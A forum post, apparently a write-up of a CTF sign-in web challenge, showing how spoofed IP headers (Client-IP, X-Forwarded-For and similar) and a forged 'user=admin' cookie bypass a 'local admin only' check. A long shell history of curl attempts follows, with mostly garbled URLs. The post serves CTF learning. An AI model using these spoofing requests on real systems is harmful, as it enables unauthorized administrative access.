-
-
[原创] 看雪 2023 KCTF 年度赛 签到题 生死较量
-
发表于: 2023-9-1 13:42 1436
-
页面提示的两个关键点:“本地” “管理员”
“本地”:用 'Client-IP: 127.0.0.1' http头 绕过
“管理员”:服务器响应有'Set-Cookie: user=guest',所以本地传一个 'Cookie: user=admin'
最终答案:
1 | curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'cc9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3j5@1y4X3g2S2x3o6V1K6i4K6u0V1x3o6f1H3z5g2)9J5k6o6b7J5z5r3q4Q4x3X3c8S2j5X3t1J5i4K6u0V1y4h3k6U0z5o6V1I4j5K6g2X3x3o6V1@1i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4 |
以上wp针对懂web的人
.
附不懂web的人一个半小时的挣扎:(来自.bash_history)
(简直是有史以来做过的最难的签到题目)
.
历程:
cookie很容易发现,F12就能看到
(然后卡了若干分钟,此时前三血都出了)
注意到"本地",用极其有限的web题经验,想到X-Fowarded-For,试了无效
(继续卡十几分钟)
查到绕本地的http头很多,挨个试
(试到Clint-IP,响应终于有变化,但为什么还提示不是admin呢)
自闭
(走偏,看到php/5.5.9版本太低,开始疯狂试验 "PHP Development Server <= 7.4.21 - Remote Source Disclosure" )
404,原来1小时到了靶机自动关闭了。重启继续(显然,后面的host都变了)
(看到响应apache,知道无用)
……
.
看下面的最后两条命令,'Cookie: ...'前面漏了'-H',所以才会提示不是admin
.
..
...
结束,太心酸了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | curl 'dd0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4 -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>; user=admin' -H 'Referer: ccbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0U0N6r3k6Q4x3X3g2C8j5h3&6^5N6h3g2Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0M7`. -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecurecurl -vvv '978K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Cookie: user=admin' '983K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Cookie: user=root' '729K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Cookie: user=administrator' '4feK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Cookie: user=admin' '70bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Cookie: user=admin' 'f8fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3H3i4K6u0r3i4K6t1%4curl -vvv -H 'Cookie: user=admin' '0cfK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '283K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: localhost' -H 'Cookie: user=admin' '961K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '9fbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: 127.0.0.1,127.0.0.1' -H 'Cookie: user=admin' 'c16K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: 127.0.0.1' http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '6acK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl '7c0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4 -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: 7beK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0U0N6r3k6Q4x3X3g2C8j5h3&6^5N6h3g2Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0M7`. -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecurecurl 'f53K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4 -H 'X-Forwarded-For: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: dc1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0U0N6r3k6Q4x3X3g2C8j5h3&6^5N6h3g2Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0M7`. -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecurecurl '253K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4 -H 'X-Forwarded-For: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: 9edK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0U0N6r3k6Q4x3X3g2C8j5h3&6^5N6h3g2Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0M7`. -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecurecurl 'c69K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4 -H 'X-Forwarded-For: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: 253K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3E0U0N6r3k6Q4x3X3g2C8j5h3&6^5N6h3g2Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0M7`. -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecurecurl -vvv -H 'X-Forwarded-For: 127.0.0.1' '359K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: 127.0.0.1,localhost' '66bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' 'b8fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '615K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-For-Original: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '3e7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Forwarded-Host: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' 'eb3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Remote-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '16bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '716K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-True-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '8b4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-IP: 127.0.0.1' 'Cookie: user=admin' '726K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '3f6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '799K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '2a2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' 'ddcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' 'e86K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=root' '689K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user="' '52aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=administrator' 'c16K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '1caK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'curl -vvv '994K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '75eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' 'e9dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3L8r3!0Y4K9h3&6Q4x3U0M7`.curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '44cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;password=test123' 'fb8K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0b7K6x3$3u0T1y4$3f1#2i4K6u0V1k6o6N6V1y4#2)9J5k6o6c8X3z5e0W2Q4x3X3b7&6j5K6c8U0i4K6u0V1x3U0l9#2x3h3p5&6y4U0u0V1y4r3q4X3i4K6u0W2L8X3!0V1k6g2)9J5k6h3E0S2L8Y4S2#2k6g2)9J5k6h3y4G2L8g2)9K6b7e0R3I4i4K6u0r3i4K6t1%4curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' 